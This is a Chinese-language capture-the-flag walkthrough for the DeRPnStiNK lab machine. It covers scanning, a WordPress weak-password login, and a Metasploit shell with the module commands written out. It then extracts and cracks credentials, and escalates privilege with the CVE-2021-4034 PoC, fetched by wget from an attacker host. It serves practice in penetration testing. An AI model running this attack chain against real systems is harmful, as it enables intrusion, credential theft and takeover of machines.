vmware打开靶机 设置网卡为NAT模式 ,记录MAC地址
端口扫描,主机发现
192.168.153.148
开放21.22.80端口
目录扫描
访问80端口 页面无信息
只有靶机的名字DeRPnStiNK
f12查看源码,发现第一个flag
发现文件 /webnotes/info.txt
拼接访问
根据提示,我们需要更改host文件,做host绑定,才能访问到
但不知道域名是什么
访问扫描出来的目录/php/phpmyadmin/
是一个phpmyadmin页面
拼接/robots.txt
发现一些接口
用 dirb进行目录扫描,出现许多上面没有扫出来的目录
weblog目录下存在登录页面
跳转到 http://derpnstink.local/weblog/
应该是要做host绑定的
vim /etc/hosts
访问 /weblog/wp-admin/
尝试弱口令admin admin
登录成功
发现是wordpress框架,尝试msf getshell
查看与wordpress登陆相关的exp进行利用
msfconsole
search slideshow
use 1
show option
set rhosts 192.168.153.148
set targeturi /weblog/ #设置目标的url目录地址
set wp_user admin
set wp_password admin
run
获得交互式命令行
shell
python -c 'import pty; pty.spawn("/bin/bash")'
翻看配置文件,/var/www/html/weblog发现了数据库的账号和密码
cat wp-config.php
登录成功
wp_posts 表发现 flag2.txt
在 wp_users 表发现两个账户密码
john破解后,得到wedgie57
在 home目录下发现两个用户,mrderp/stinky
su 切换用户 使用刚才破解的密码
在 ~/Desktop 下发现flag文件
使用 cve-2021-4034-poc.c 提权
github下载地址 https://github.com/arthepsy/CVE-2021-4034
靶机操作
cd /tmp
wget http://192.168.153.143:8000/cve-2021-4034-poc.c
chmod +x cve-2021-4034-poc.c
gcc -pthread cve-2021-4034-poc.c -o cve-2021-4034-poc -lcrypt
运行